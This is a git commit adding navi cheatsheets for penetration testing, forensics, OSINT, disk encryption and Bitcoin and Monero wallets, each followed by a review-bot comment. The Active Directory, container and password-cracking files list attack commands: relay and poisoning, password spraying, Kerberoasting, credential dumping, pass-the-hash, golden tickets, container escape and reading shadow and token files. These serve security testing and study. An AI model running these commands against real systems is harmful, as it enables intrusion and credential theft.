Initial cypherpunk-cheats collection: 22 navi cheatsheets

rpriven 2026-01-04 15:05:38 -07:00
commit 0fc9b49c22
Signed by: djedi
GPG key ID: D04DED574622EF45
25 changed files with 2296 additions and 0 deletions

.gitignore vendored Normal file

@ -0,0 +1,14 @@
# OS
.DS_Store
Thumbs.db
# Editors
*.swp
*.swo
*~
.vscode/
.idea/
# Temp files
*.tmp
*.bak

LICENSE Normal file

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 rpriven
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

README.md Normal file

@ -0,0 +1,104 @@
# Cypherpunk Cheats
Navi-compatible cheatsheets for security, privacy, and digital sovereignty.
## Installation
```bash
# Install navi
cargo install navi
# Or via package manager
sudo apt install navi # Debian/Ubuntu
brew install navi # macOS
# Add this repo to navi (choose one)
navi repo add https://github.com/rpriven/cypherpunk-cheats # GitHub
navi repo add https://git.djeditech.com/djedi/cypherpunk-cheats # Mirror
```
## Manual Setup
Add to your navi config (`~/.config/navi/config.yaml`):
```yaml
cheats:
paths:
- /path/to/cypherpunk-cheats
```
## Usage
```bash
# Launch navi
navi
# Query specific topic
navi --query "nmap"
navi --query "monero"
navi --query "luks"
# Preview mode
navi --preview
# Use with custom path
navi --path /path/to/cypherpunk-cheats
```
## Categories
### Offensive Security
| File | Description |
|------|-------------|
| `nmap.cheat` | Port scanning and service enumeration |
| `web.cheat` | Web application testing (ffuf, sqlmap, nikto) |
| `hashcat.cheat` | Password cracking with Hashcat |
| `john.cheat` | John the Ripper password cracking |
| `privesc-linux.cheat` | Linux privilege escalation |
| `privesc-windows.cheat` | Windows privilege escalation |
| `active-directory.cheat` | AD attacks (NetExec, Kerberoasting) |
| `containers.cheat` | Docker/Kubernetes security |
| `wireless.cheat` | WiFi attacks (aircrack-ng, WPA cracking) |
| `tunnels.cheat` | SSH tunnels, chisel, pivoting |
### DFIR & Analysis
| File | Description |
|------|-------------|
| `forensics.cheat` | Volatility, disk imaging, evidence collection |
| `osint.cheat` | Sherlock, theHarvester, recon-ng |
| `wireshark.cheat` | Packet analysis (tshark, tcpdump) |
| `reversing.cheat` | Ghidra, radare2, GDB, binary analysis |
| `steganography.cheat` | Hidden data extraction (steghide, binwalk) |
### Privacy & Encryption
| File | Description |
|------|-------------|
| `privacy.cheat` | Tor, GPG, age encryption, metadata removal |
| `luks.cheat` | Full disk encryption (LUKS, dm-crypt) |
| `pass.cheat` | Password managers (pass, KeePassXC) |
| `secure-comms.cheat` | Signal CLI, Matrix, encrypted messaging |
### Cryptocurrency & Web3
| File | Description |
|------|-------------|
| `monero.cheat` | Monero CLI wallet operations |
| `bitcoin.cheat` | Bitcoin Core CLI operations |
| `solidity.cheat` | Smart contract auditing (Slither, Foundry) |
## Philosophy
Built for cypherpunks who value:
- **Privacy** - Default to encrypted, anonymous, and sovereign
- **Security** - Offensive knowledge for defensive thinking
- **Freedom** - Tools for digital self-determination
## Contributing
PRs welcome! Follow the navi `.cheat` format:
- `%` tags for categories
- `#` comments for descriptions
- `$` for argument completion
## License
MIT
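Review bot: the "Manual Setup" YAML block will not be read by navi as rendered here, because `cheats:`, `paths:` and the `- /path/to/cypherpunk-cheats` item are all flush-left, which YAML parses as two unrelated top-level keys (`cheats: null` and a stray `paths`). Indent `paths:` under `cheats:` and the list item under `paths:` (two spaces each) so the path ends up at `cheats.paths[0]`, which is the key navi looks for.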

active-directory.cheat Normal file

@ -0,0 +1,75 @@
% ad, active-directory, kerberos, windows, netexec
# Start Responder (LLMNR/NBT-NS poisoning)
sudo responder -I <interface> -dwPv
# SMB relay attack
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Get domain users (NetExec - replacement for crackmapexec)
nxc smb <dc_ip> -u <username> -p <password> --users
# Get domain groups
nxc smb <dc_ip> -u <username> -p <password> --groups
# Password spray
nxc smb <dc_ip> -u users.txt -p '<password>' --continue-on-success
# Password spray multiple passwords
nxc smb <dc_ip> -u users.txt -p passwords.txt --no-bruteforce --continue-on-success
# Kerberoasting - Get TGS tickets
GetUserSPNs.py <domain>/<username>:<password> -dc-ip <dc_ip> -request
# AS-REP Roasting
GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <dc_ip> -format hashcat
# Dump secrets (admin required)
secretsdump.py <domain>/<username>:<password>@<target>
# Pass the hash
psexec.py <domain>/<username>@<target> -hashes <lmhash>:<nthash>
# Pass the hash with NetExec
nxc smb <target> -u <username> -H <nthash>
# DCSync attack
secretsdump.py <domain>/<username>:<password>@<dc_ip> -just-dc
# Get shell with psexec
psexec.py <domain>/<username>:<password>@<target>
# Get shell with wmiexec
wmiexec.py <domain>/<username>:<password>@<target>
# Get shell with evil-winrm
evil-winrm -i <target> -u <username> -p <password>
# BloodHound collection
bloodhound-python -d <domain> -u <username> -p <password> -c all -ns <dc_ip>
# PowerView - Get domain info
Import-Module .\PowerView.ps1; Get-Domain
# PowerView - Get domain users
Get-DomainUser | select samaccountname
# PowerView - Get domain computers
Get-DomainComputer | select name
# PowerView - Find domain admins
Get-DomainGroupMember "Domain Admins"
# Golden ticket with mimikatz
mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /ptt" "exit"
# Silver ticket
mimikatz.exe "kerberos::golden /User:Administrator /domain:<domain> /sid:<domain_sid> /target:<target> /service:<service> /rc4:<service_hash> /ptt" "exit"
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
$ dc_ip: echo ""
$ domain: echo ""
$ username: echo ""
$ password: echo ""
$ target: echo ""
$ nthash: echo ""
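Review bot: several lines in this cheat are not bash commands but will be executed by navi through its configured shell (bash by default) when the user presses Enter: the PowerView lines (`Import-Module .\PowerView.ps1; Get-Domain`, `Get-DomainUser | select samaccountname`, ...) and the `mimikatz.exe "..."` lines are PowerShell/Windows commands and will simply fail, or worse, partially run (`select` will try to execute as a shell builtin). Either move them to a separately tagged `%` section whose comment says they are for copying (Ctrl-Y) rather than running, or keep the file to commands that are valid in the shell navi uses. Separately, `<lmhash>`, `<domain_sid>`, `<krbtgt_hash>`, `<service>` and `<service_hash>` have no `$` definition while every other placeholder does; navi will still prompt for free text, but add matching `$ name: echo ""` lines for consistency with the rest of the file.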

bitcoin.cheat Normal file

@ -0,0 +1,132 @@
% bitcoin, btc, cryptocurrency, wallet
# Start Bitcoin daemon
bitcoind
# Start daemon with options
bitcoind -daemon -server
# Stop daemon
bitcoin-cli stop
# Get blockchain info
bitcoin-cli getblockchaininfo
# Get network info
bitcoin-cli getnetworkinfo
# Get wallet info
bitcoin-cli getwalletinfo
# Create new wallet
bitcoin-cli createwallet "<wallet_name>"
# Load wallet
bitcoin-cli loadwallet "<wallet_name>"
# List wallets
bitcoin-cli listwallets
# Generate new address
bitcoin-cli getnewaddress
# Generate new address with label
bitcoin-cli getnewaddress "<label>"
# Get balance
bitcoin-cli getbalance
# List unspent outputs
bitcoin-cli listunspent
# List transactions
bitcoin-cli listtransactions
# Get transaction details
bitcoin-cli gettransaction "<txid>"
# Send to address
bitcoin-cli sendtoaddress "<address>" <amount>
# Send with fee rate
bitcoin-cli sendtoaddress "<address>" <amount> "" "" false true null "unset" null <fee_rate>
# Create raw transaction
bitcoin-cli createrawtransaction '[{"txid":"<txid>","vout":<vout>}]' '{"<address>":<amount>}'
# Sign raw transaction
bitcoin-cli signrawtransactionwithwallet "<hex>"
# Send raw transaction
bitcoin-cli sendrawtransaction "<hex>"
# Estimate fee (blocks to confirm)
bitcoin-cli estimatesmartfee <blocks>
# Dump private key (WIF)
bitcoin-cli dumpprivkey "<address>"
# Import private key
bitcoin-cli importprivkey "<wif_key>"
# Backup wallet
bitcoin-cli backupwallet "<backup_path>"
# Encrypt wallet
bitcoin-cli encryptwallet "<passphrase>"
# Unlock wallet (seconds)
bitcoin-cli walletpassphrase "<passphrase>" <timeout>
# Lock wallet
bitcoin-cli walletlock
# Get block hash
bitcoin-cli getblockhash <height>
# Get block data
bitcoin-cli getblock "<blockhash>"
# Decode raw transaction
bitcoin-cli decoderawtransaction "<hex>"
# Verify message signature
bitcoin-cli verifymessage "<address>" "<signature>" "<message>"
# Sign message
bitcoin-cli signmessage "<address>" "<message>"
# Sparrow Wallet (GUI - recommended)
sparrow
# Electrum (lightweight wallet)
electrum
# Hardware wallet - Trezor
trezorctl list
trezorctl get-address -n "m/84'/0'/0'/0/0"
# Hardware wallet - Ledger
# Use Ledger Live or HWI
# Bitcoin Core config (~/.bitcoin/bitcoin.conf)
# server=1
# rpcuser=user
# rpcpassword=pass
# txindex=1
$ wallet_name: bitcoin-cli listwallets 2>/dev/null | jq -r '.[]' 2>/dev/null
$ label: echo "main"
$ txid: echo ""
$ address: echo ""
$ amount: echo "0.001"
$ fee_rate: echo "10"
$ vout: echo "0"
$ hex: echo ""
$ wif_key: echo ""
$ backup_path: echo "wallet_backup.dat"
$ passphrase: echo ""
$ timeout: echo "60"
$ height: echo "0"
$ blockhash: echo ""
$ blocks: echo "6"
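Review bot: `bitcoin-cli encryptwallet "<passphrase>"` and `bitcoin-cli walletpassphrase "<passphrase>" <timeout>` put the wallet passphrase on the command line, where it lands in shell history and is visible to every local user via `ps`; bitcoin-cli has `-stdin` (read arguments from stdin) and `-stdinwalletpassphrase` for exactly this case, so the cheat should use `bitcoin-cli -stdinwalletpassphrase walletpassphrase <timeout>` and drop the `$ passphrase` prompt. Two smaller points: `dumpprivkey` and `importprivkey` only work on legacy wallets and error out on the descriptor wallets that `createwallet` makes by default in current Bitcoin Core (descriptor wallets use `listdescriptors`/`importdescriptors`), and the sample `bitcoin.conf` comment should recommend `rpcauth=` (salted hash) over a plaintext `rpcpassword=`.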

containers.cheat Normal file

@ -0,0 +1,67 @@
% docker, kubernetes, containers, escape
# Check if inside container
ls -la /.dockerenv
cat /proc/1/cgroup | grep docker
# List docker images
docker images
# List running containers
docker ps
# List all containers
docker ps -a
# Execute into container
docker exec -it <container_id> /bin/bash
# Inspect container
docker inspect <container_id>
# Docker socket escape (if socket mounted)
docker run -v /:/hostfs -it alpine chroot /hostfs
# Privileged container escape - mount host
mkdir /mnt/host && mount /dev/sda1 /mnt/host
# Check capabilities
capsh --print
# Kubernetes - get pods
kubectl get pods
# Kubernetes - get all namespaces
kubectl get namespaces
# Kubernetes - get pods all namespaces
kubectl get pods --all-namespaces
# Kubernetes - get secrets
kubectl get secrets
# Kubernetes - decode secret
kubectl get secret <secret_name> -o yaml
# Kubernetes - exec into pod
kubectl exec -it <pod_name> -- /bin/bash
# Get service account token
cat /var/run/secrets/kubernetes.io/serviceaccount/token
# Check RBAC permissions
kubectl auth can-i --list
# Trivy - scan image
trivy image <image_name>
# Deepce - Docker enumeration
./deepce.sh
# CDK - container pentest toolkit
./cdk evaluate
$ container_id: docker ps --format "{{.ID}}\t{{.Names}}" 2>/dev/null
$ pod_name: kubectl get pods --no-headers 2>/dev/null | awk '{print $1}'
$ secret_name: kubectl get secrets --no-headers 2>/dev/null | awk '{print $1}'
$ image_name: docker images --format "{{.Repository}}:{{.Tag}}" 2>/dev/null
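Review bot: the `$ container_id` suggestion emits two columns (`{{.ID}}\t{{.Names}}`) but has no column selector, so navi substitutes the whole selected line and `docker exec -it <id><TAB><name> /bin/bash` fails; append navi's column option, e.g. `docker ps --format "{{.ID}}\t{{.Names}}" --- --column 1`, or format only the ID. Also, the "Kubernetes - decode secret" entry does not decode anything: `-o yaml` prints the base64 values as stored; the decoding form is `kubectl get secret <secret_name> -o jsonpath='{.data.<key>}' | base64 -d`, or at least the comment should say "dump secret (base64)".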

forensics.cheat Normal file

@ -0,0 +1,97 @@
% forensics, dfir, volatility, memory, incident-response
# Volatility 3 - identify OS
vol -f <memory_dump> windows.info
# Volatility 3 - process list
vol -f <memory_dump> windows.pslist
# Volatility 3 - process tree
vol -f <memory_dump> windows.pstree
# Volatility 3 - hidden processes
vol -f <memory_dump> windows.psscan
# Volatility 3 - network connections
vol -f <memory_dump> windows.netscan
# Volatility 3 - command line history
vol -f <memory_dump> windows.cmdline
# Volatility 3 - DLLs for process
vol -f <memory_dump> windows.dlllist --pid <pid>
# Volatility 3 - malware detection
vol -f <memory_dump> windows.malfind
# Volatility 3 - registry hives
vol -f <memory_dump> windows.registry.hivelist
# Volatility 3 - dump process memory
vol -f <memory_dump> windows.memmap --pid <pid> --dump
# Volatility 2 - image info (legacy)
volatility -f <memory_dump> imageinfo
# Volatility 2 - with profile
volatility -f <memory_dump> --profile=<profile> pslist
# Disk imaging with dd
sudo dd if=<source_device> of=<output_file> bs=64K conv=noerror,sync status=progress
# Disk imaging with dcfldd (forensic)
sudo dcfldd if=<source_device> of=<output_file> hash=md5,sha256 hashlog=hashes.txt
# Mount forensic image read-only
sudo mount -o ro,loop,noexec <image_file> <mount_point>
# Mount with offset (partition)
sudo mount -o ro,loop,offset=$((512*<sector_offset>)) <image_file> <mount_point>
# File carving with foremost
foremost -i <image_file> -o <output_dir>
# File recovery with photorec
photorec <image_file>
# File recovery with scalpel
scalpel -c /etc/scalpel/scalpel.conf -o <output_dir> <image_file>
# Timeline with plaso
log2timeline.py <output.plaso> <evidence_source>
# Parse plaso timeline
psort.py -o l2tcsv <output.plaso> -w timeline.csv
# Extract strings from binary
strings -n 8 <file>
strings -e l <file>
# Calculate file hashes
md5sum <file> && sha256sum <file>
# Chainsaw - Windows event log hunting
chainsaw hunt <evtx_dir> --rules <sigma_rules_dir>
# Parse Windows prefetch
PECmd.exe -d C:\Windows\Prefetch --csv <output_dir>
# Registry analysis with RegRipper
rip.pl -r <registry_hive> -p all
# KAPE collection
kape.exe --tsource C: --tdest <output_dir> --target !SANS_Triage
# Autopsy (GUI forensics)
autopsy
$ memory_dump: find . -name "*.raw" -o -name "*.mem" -o -name "*.dmp" 2>/dev/null
$ source_device: lsblk -dpno NAME | head -5
$ output_file: echo "disk.raw"
$ image_file: find . -name "*.raw" -o -name "*.dd" -o -name "*.img" 2>/dev/null
$ mount_point: echo "/mnt/evidence"
$ output_dir: echo "output"
$ pid: echo ""
$ profile: echo "Win10x64_19041"
$ sector_offset: echo "2048"
$ evtx_dir: echo "/path/to/evtx"
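Review bot: `mount -o ro,loop,noexec <image_file> <mount_point>` is not a forensically safe read-only mount for ext3/ext4 images: even with `ro`, the kernel replays a dirty journal on mount and modifies the image (and its hash). Add `noload` for ext filesystems (`-o ro,loop,noexec,noload`) and `norecovery` for XFS, and mention that the loop device itself should be set up read-only (`losetup -r`) or the image file made immutable; the same applies to the offset variant on the next line. Also, `rip.pl -r <registry_hive> -p all` will not run all plugins: in RegRipper 3.x `-p` takes a single plugin name, and `-a` is the switch that runs every plugin appropriate to the hive type.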

hashcat.cheat Normal file

@ -0,0 +1,50 @@
% hashcat, cracking, passwords
# Crack MD5 hash
hashcat -m 0 <hashfile> <wordlist> -O
# Crack NTLM hash
hashcat -m 1000 <hashfile> <wordlist> -O
# Crack NTLMv2 (Responder capture)
hashcat -m 5600 <hashfile> <wordlist> -O
# Crack SHA-512 Linux ($6$)
hashcat -m 1800 <hashfile> <wordlist> -O
# Crack Kerberoasting TGS
hashcat -m 13100 <hashfile> <wordlist> -O
# Crack AS-REP Roast
hashcat -m 18200 <hashfile> <wordlist> -O
# Crack WPA2
hashcat -m 22000 <hashfile> <wordlist> -O
# Crack bcrypt
hashcat -m 3200 <hashfile> <wordlist> -O
# Crack JWT
hashcat -m 16500 <hashfile> <wordlist> -O
# With rules (best64)
hashcat -m <mode> <hashfile> <wordlist> -r /usr/share/hashcat/rules/best64.rule -O
# Mask attack - 4 digits
hashcat -m <mode> <hashfile> -a 3 ?d?d?d?d
# Mask attack - 8 lowercase
hashcat -m <mode> <hashfile> -a 3 ?l?l?l?l?l?l?l?l
# Mask attack - Password1! pattern
hashcat -m <mode> <hashfile> -a 3 ?u?l?l?l?l?l?l?l?d?s
# Show cracked passwords
hashcat -m <mode> <hashfile> --show
# Resume session
hashcat --restore
$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ mode: echo "0\n100\n1000\n1400\n1700\n1800\n3200\n5600\n13100\n18200" --- --header "Mode: 0=MD5, 100=SHA1, 1000=NTLM, 1400=SHA256, 1700=SHA512, 1800=sha512crypt, 3200=bcrypt, 5600=NTLMv2, 13100=Kerberoast, 18200=AS-REP"
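Review bot: the `$ mode` suggestion is broken under bash, navi's default shell: bash's `echo` does not interpret `\n`, so `echo "0\n100\n1000..."` produces a single line containing literal backslash-n sequences and the picker shows one useless entry. Use `printf '%s\n' 0 100 1000 1400 1700 1800 3200 5600 13100 18200` (or `echo -e`) so each mode is its own line; the same pattern appears in the `$ slot_number`, `$ priority` and `$ length` suggestions of the luks, monero and pass cheats. One caveat worth adding to the comments: every line passes `-O`, and the optimized kernels cap candidate length (typically 31 characters, less for some modes), so long passphrases are silently never tried; note that `-O` should be dropped for rules or masks that can exceed the limit.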

john.cheat Normal file

@ -0,0 +1,58 @@
% john, cracking, passwords
# Auto-detect and crack
john <hashfile>
# Crack with wordlist
john --wordlist=<wordlist> <hashfile>
# Crack NTLM
john --format=nt --wordlist=<wordlist> <hashfile>
# Crack MD5
john --format=raw-md5 --wordlist=<wordlist> <hashfile>
# Crack SHA-512 Linux
john --format=sha512crypt --wordlist=<wordlist> <hashfile>
# Crack bcrypt
john --format=bcrypt --wordlist=<wordlist> <hashfile>
# Show cracked passwords
john --show <hashfile>
# With rules
john --wordlist=<wordlist> --rules <hashfile>
# SSH key crack
ssh2john <ssh_key> > ssh_hash.txt && john --wordlist=<wordlist> ssh_hash.txt
# ZIP file crack
zip2john <zip_file> > zip_hash.txt && john --wordlist=<wordlist> zip_hash.txt
# RAR file crack
rar2john <rar_file> > rar_hash.txt && john --wordlist=<wordlist> rar_hash.txt
# PDF crack
pdf2john <pdf_file> > pdf_hash.txt && john --wordlist=<wordlist> pdf_hash.txt
# Office document crack
office2john <office_file> > office_hash.txt && john --wordlist=<wordlist> office_hash.txt
# KeePass crack
keepass2john <kdbx_file> > keepass_hash.txt && john --wordlist=<wordlist> keepass_hash.txt
# Linux shadow file
unshadow /etc/passwd /etc/shadow > unshadowed.txt && john --wordlist=<wordlist> unshadowed.txt
# List available formats
john --list=formats
$ hashfile: find . -name "*.txt" -o -name "*.hash" 2>/dev/null
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ ssh_key: find . -name "id_rsa" -o -name "*.pem" 2>/dev/null
$ zip_file: find . -name "*.zip" 2>/dev/null
$ rar_file: find . -name "*.rar" 2>/dev/null
$ pdf_file: find . -name "*.pdf" 2>/dev/null
$ office_file: find . -name "*.docx" -o -name "*.xlsx" 2>/dev/null
$ kdbx_file: find . -name "*.kdbx" 2>/dev/null
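Review bot: `john --show <hashfile>` should carry the same `--format=` that was used for cracking whenever the hash is ambiguous (raw-md5 vs. other 32-hex formats, nt vs. raw-md4, and so on); without it john re-detects the format, may pick a different one, and reports "0 password hashes cracked" even though the pot file has the result. Suggest `john --show --format=<format> <hashfile>` with a `$ format` suggestion, or a comment saying to repeat the `--format` flag.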

luks.cheat Normal file

@ -0,0 +1,124 @@
% luks, encryption, disk, dm-crypt, fde
# Check if device is LUKS
sudo cryptsetup isLuks <device>
# LUKS info
sudo cryptsetup luksDump <device>
# Create LUKS volume
sudo cryptsetup luksFormat <device>
# Create LUKS2 volume (recommended)
sudo cryptsetup luksFormat --type luks2 <device>
# Create LUKS with specific cipher
sudo cryptsetup luksFormat --cipher aes-xts-plain64 --key-size 512 --hash sha512 <device>
# Open LUKS volume
sudo cryptsetup luksOpen <device> <mapper_name>
# Open LUKS (alternative syntax)
sudo cryptsetup open <device> <mapper_name>
# Close LUKS volume
sudo cryptsetup luksClose <mapper_name>
# Add key to LUKS
sudo cryptsetup luksAddKey <device>
# Add key from file
sudo cryptsetup luksAddKey <device> <keyfile>
# Remove key
sudo cryptsetup luksRemoveKey <device>
# Kill key slot
sudo cryptsetup luksKillSlot <device> <slot_number>
# Change passphrase
sudo cryptsetup luksChangeKey <device>
# Create filesystem on opened LUKS
sudo mkfs.ext4 /dev/mapper/<mapper_name>
# Mount LUKS volume
sudo mount /dev/mapper/<mapper_name> <mount_point>
# Unmount LUKS volume
sudo umount <mount_point>
sudo cryptsetup luksClose <mapper_name>
# Create encrypted file container
dd if=/dev/zero of=<container_file> bs=1M count=<size_mb>
sudo cryptsetup luksFormat <container_file>
sudo cryptsetup luksOpen <container_file> <mapper_name>
sudo mkfs.ext4 /dev/mapper/<mapper_name>
# Backup LUKS header
sudo cryptsetup luksHeaderBackup <device> --header-backup-file <backup_file>
# Restore LUKS header
sudo cryptsetup luksHeaderRestore <device> --header-backup-file <backup_file>
# Erase LUKS header (DESTROYS DATA!)
sudo cryptsetup luksErase <device>
# Check LUKS status
sudo cryptsetup status <mapper_name>
# Benchmark encryption
cryptsetup benchmark
# Auto-mount with /etc/crypttab
# <mapper_name> <device> none luks
# Auto-mount with keyfile
# <mapper_name> <device> <keyfile> luks
# Full disk encryption install (Ubuntu)
# Select "Encrypt the new Ubuntu installation" during install
# Encrypt home directory (ecryptfs - legacy)
sudo apt install ecryptfs-utils
ecryptfs-migrate-home -u <username>
# LUKS on LVM
sudo pvcreate /dev/mapper/<mapper_name>
sudo vgcreate <vg_name> /dev/mapper/<mapper_name>
sudo lvcreate -l 100%FREE -n <lv_name> <vg_name>
# Resize LUKS volume (grow)
sudo cryptsetup resize <mapper_name>
sudo resize2fs /dev/mapper/<mapper_name>
# Create encrypted swap
sudo cryptsetup luksFormat <swap_device>
sudo cryptsetup luksOpen <swap_device> cryptswap
sudo mkswap /dev/mapper/cryptswap
sudo swapon /dev/mapper/cryptswap
# VeraCrypt CLI - create volume
veracrypt -t -c
# VeraCrypt CLI - mount
veracrypt <volume_file> <mount_point>
# VeraCrypt CLI - dismount
veracrypt -d
# VeraCrypt CLI - list mounted
veracrypt -l
$ device: lsblk -dpno NAME | grep -v loop
$ mapper_name: ls /dev/mapper 2>/dev/null | grep -v control
$ mount_point: echo "/mnt/encrypted"
$ keyfile: echo "/root/keyfile"
$ backup_file: echo "luks_header.backup"
$ container_file: echo "encrypted_container.img"
$ size_mb: echo "1024"
$ slot_number: echo "0\n1\n2\n3\n4\n5\n6\n7"
$ username: whoami
$ vg_name: echo "encrypted_vg"
$ lv_name: echo "data"
$ volume_file: find ~ -name "*.hc" -o -name "*.tc" 2>/dev/null | head -5
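Review bot: the "Backup LUKS header" entry needs a caveat that the backup is a full copy of every keyslot at the time it was taken: any passphrase later removed with `luksRemoveKey`, `luksKillSlot` or `luksChangeKey` still unlocks the volume through the old header backup, so the backup must be stored offline/encrypted and refreshed after every key change. Two smaller points: the encrypted-container recipe creates the file with `dd if=/dev/zero`, which leaves the unused region as recognisable zeros after formatting (use `/dev/urandom`, or fill the opened mapper with zeros through `dd if=/dev/zero of=/dev/mapper/<mapper_name>` so the padding is ciphertext), and `$ slot_number: echo "0\n1..."` prints a single line under bash; use `printf '%s\n' 0 1 2 3 4 5 6 7` (LUKS2 has 32 slots, LUKS1 has 8).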

monero.cheat Normal file

@ -0,0 +1,121 @@
% monero, xmr, cryptocurrency, wallet
# Start Monero daemon
monerod
# Start daemon with remote node (no local blockchain)
monerod --bootstrap-daemon-address auto
# Start wallet CLI
monero-wallet-cli
# Create new wallet
monero-wallet-cli --generate-new-wallet <wallet_name>
# Open existing wallet
monero-wallet-cli --wallet-file <wallet_file>
# Connect to remote node
monero-wallet-cli --daemon-address <node_address>
# Restore wallet from seed
monero-wallet-cli --restore-deterministic-wallet
# Restore from keys
monero-wallet-cli --generate-from-keys <wallet_name>
# Check balance (in wallet)
balance
# Check unlocked balance
balance unlocked
# Get wallet address
address
# Get all addresses (subaddresses)
address all
# Create new subaddress
address new <label>
# Show seed (KEEP SECRET!)
seed
# Show private keys (KEEP SECRET!)
spendkey
viewkey
# Transfer XMR
transfer <address> <amount>
# Transfer with priority
transfer <priority> <address> <amount>
# Sweep all to address
sweep_all <address>
# Show transaction history
show_transfers
# Show incoming transfers
show_transfers in
# Show outgoing transfers
show_transfers out
# Show pending transfers
show_transfers pending
# Check transaction status
show_transfer <txid>
# Export outputs (for hardware wallet)
export_outputs outputs.txt
# Import outputs
import_outputs outputs.txt
# Export key images
export_key_images key_images.txt
# Sign message with wallet
sign <message>
# Verify signed message
verify <address> <signature> <message>
# Rescan blockchain
rescan_bc
# Rescan spent outputs
rescan_spent
# Refresh wallet
refresh
# Set daemon address
set_daemon <node_address>
# Check daemon status
status
# Get fee estimate
fee
# Stop wallet
exit
# Public remote nodes (use with caution)
# node.moneroworld.com:18089
# nodes.hashvault.pro:18081
# xmr-node.cakewallet.com:18081
$ wallet_name: echo "my_wallet"
$ wallet_file: find ~ -name "*.keys" 2>/dev/null | head -5
$ node_address: echo "node.moneroworld.com:18089"
$ address: echo ""
$ amount: echo "0.1"
$ priority: echo "0\n1\n2\n3\n4" --- --header "0=default, 1=unimportant, 2=normal, 3=elevated, 4=priority"
$ txid: echo ""
$ label: echo "donation"
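Review bot: the remote-node entries (`--daemon-address`, `--bootstrap-daemon-address auto`, the hard-coded `$ node_address` default) should say what "use with caution" means: a third-party node learns the wallet's IP address, when it refreshes and which transactions it broadcasts, which undoes much of Monero's on-chain privacy; the comment should recommend a self-hosted node or at least routing the wallet through Tor (e.g. `torsocks monero-wallet-cli ...`, as the privacy cheat already does for curl). Also, the CLI `transfer [<priority>] <address> <amount>` expects a keyword (`unimportant`, `normal`, `elevated`, `priority`); the numeric `0`..`4` values offered by `$ priority` belong to the `set priority` wallet setting and the RPC, and under bash that `echo "0\n1..."` produces one literal line anyway (use `printf '%s\n' unimportant normal elevated priority`).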

nmap.cheat Normal file

@ -0,0 +1,53 @@
% nmap, scanning, recon
# Quick SYN scan (top 1000 ports)
nmap -sS <target>
# Full port scan (all 65535)
nmap -sS -p- <target>
# Service version detection
nmap -sV <target>
# OS detection
nmap -O <target>
# Aggressive scan (OS, version, scripts, traceroute)
nmap -A <target>
# UDP scan (top ports)
nmap -sU --top-ports 20 <target>
# Script scan (default scripts)
nmap -sC <target>
# Vulnerability scan
nmap --script vuln <target>
# SMB enumeration
nmap --script smb-enum-shares,smb-enum-users -p 445 <target>
# HTTP enumeration
nmap --script http-enum -p 80,443 <target>
# Full comprehensive scan
nmap -sS -sV -sC -O -p- -oA scan_<target> <target>
# Scan multiple targets from file
nmap -iL <targets_file>
# Fast scan (top 100 ports)
nmap -F <target>
# Ping sweep (host discovery)
nmap -sn <network_cidr>
# Skip ping (scan even if host appears down)
nmap -Pn <target>
# Output all formats
nmap -sS -sV -oA output_<target> <target>
$ target: echo ""
$ targets_file: find . -name "*.txt" -type f 2>/dev/null
$ network_cidr: echo "192.168.1.0/24"
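Review bot: the SYN (`-sS`), UDP (`-sU`), OS-detection (`-O`) and `-A` entries need raw-socket privileges, but none of them is prefixed with `sudo` while the rest of the collection uses `sudo` consistently; run unprivileged, nmap silently falls back to a TCP connect scan for `-sS` and errors out for `-sU`/`-O`, so add `sudo` to those lines (the `-sV`, `-sC`, `-F`, `-Pn` and `-sn` lines are fine as they are).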

osint.cheat Normal file

@ -0,0 +1,106 @@
% osint, recon, reconnaissance, intelligence
# Sherlock - username search
sherlock <username>
# Sherlock - multiple usernames
sherlock <username1> <username2> <username3>
# Maigret - username search (better)
maigret <username>
# theHarvester - all sources
theHarvester -d <domain> -b all
# theHarvester - specific sources
theHarvester -d <domain> -b google,linkedin,twitter
# Subfinder - subdomain enumeration
subfinder -d <domain>
# Subfinder - with output
subfinder -d <domain> -o subdomains.txt
# Amass - subdomain enum
amass enum -d <domain>
# Amass - passive only
amass enum -passive -d <domain>
# Certificate transparency lookup
curl -s "https://crt.sh/?q=%.<domain>&output=json" | jq -r '.[].name_value' | sort -u
# DNS enumeration
dig <domain> ANY
dig <domain> MX
dig <domain> TXT
# Zone transfer attempt
dig axfr @<nameserver> <domain>
# Whois lookup
whois <domain>
# Reverse whois (by email)
# Use viewdns.info or whoxy.com
# Google dorking - site specific
# site:<domain> filetype:pdf
# Google dorking - login pages
# site:<domain> inurl:login OR inurl:admin
# Google dorking - exposed files
# site:<domain> filetype:sql OR filetype:env OR filetype:log
# Wayback machine URLs
waybackurls <domain>
# GitHub dorking - secrets
# org:<company> password OR api_key OR secret
# Shodan - host info
shodan host <ip>
# Shodan - search
shodan search "hostname:<domain>"
# Shodan - org search
shodan search 'org:"<company_name>"'
# Email verification
curl "https://api.hunter.io/v2/email-verifier?email=<email>&api_key=<api_key>"
# SpiderFoot scan
spiderfoot -s <target> -o output.html
# Recon-ng
recon-ng
# Then: marketplace install all
# workspaces create <name>
# modules load recon/domains-hosts/hackertarget
# Social media - Instagram OSINT
# instaloader <username>
# Image reverse search
# Google Images, TinEye, Yandex
# Metadata extraction
exiftool <image>
# GPS from image
